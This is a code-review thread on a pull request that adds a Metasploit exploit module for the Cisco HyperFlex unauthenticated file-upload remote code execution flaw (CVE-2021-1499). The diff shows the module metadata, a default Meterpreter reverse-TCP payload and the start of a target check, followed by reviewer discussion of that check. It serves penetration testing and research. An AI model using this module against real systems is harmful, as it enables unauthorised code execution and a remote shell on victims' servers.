modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

```diff
@@ -0,0 +1,143 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)',
+        'Description' => %q{
+          This module exploits an unauthenticated file upload vulnerability in
+          Cisco HyperFlex HX Data Platform's /upload endpoint to upload and
+          execute a payload as the Tomcat user.
+        },
+        'Author' => [
+          'Nikita Abramov',      # Discovery
+          'Mikhail Klyuchnikov', # Discovery
+          'jheysel-r7'           # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2021-1499'], # HyperFlex HX File Upload
+          ['URL', 'https://attackerkb.com/topics/Z2MeUsvSlT/cve-2021-1499']
+        ],
+        'DisclosureDate' => '2021-05-05',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        # 'Arch' => [ARCH_CMD, ARCH_JAVA],
+        'Privileged' => false, # Privesc left as an exercise for the reader
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp',
+                'WfsDelay' => 10
+              }
+            }
+          ]
+          # ['Java Dropper',
+          #  'Platform'       => 'java',
+          #  'Arch'           => ARCH_JAVA,
+          #  'Version'        => Rex::Version.new('2.137'),
+          #  'Type'           => :java_dropper,
+          #  'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'}
+          # ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('UPLOAD_FILE_NAME', [false, 'Choose a filename for the payload. (Default is random)', rand_text_alpha(rand(8..15))])
+    ])
+    register_advanced_options([
+      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'upload')
+    )
+    if res && res.code == 400 && res.headers['Server'][/nginx/i] && res.body[/Apache Tomcat/]
+      return Exploit::CheckCode::Appears
```

Comment:
Is there any additional request, maybe to another resource or something that could be used to verify the HyperFlex service is running?

Reply:
I've pushed some changes to check the body of the homepage behind SSL for a unique Cisco HyperFlex indicator.  

Not certain if I implemented this correctly - before this check the module was not using SSL / hitting port `443`. 
I manually edited the `datastore` variables; `RPORT` and `SSL` and manually switched them back to their original values after running the check. 

Please let me know if there's a better way do to this.

Reply:
You can pass options to `send_request_*`.

Reply:
What was I thinking, thanks, that makes sense.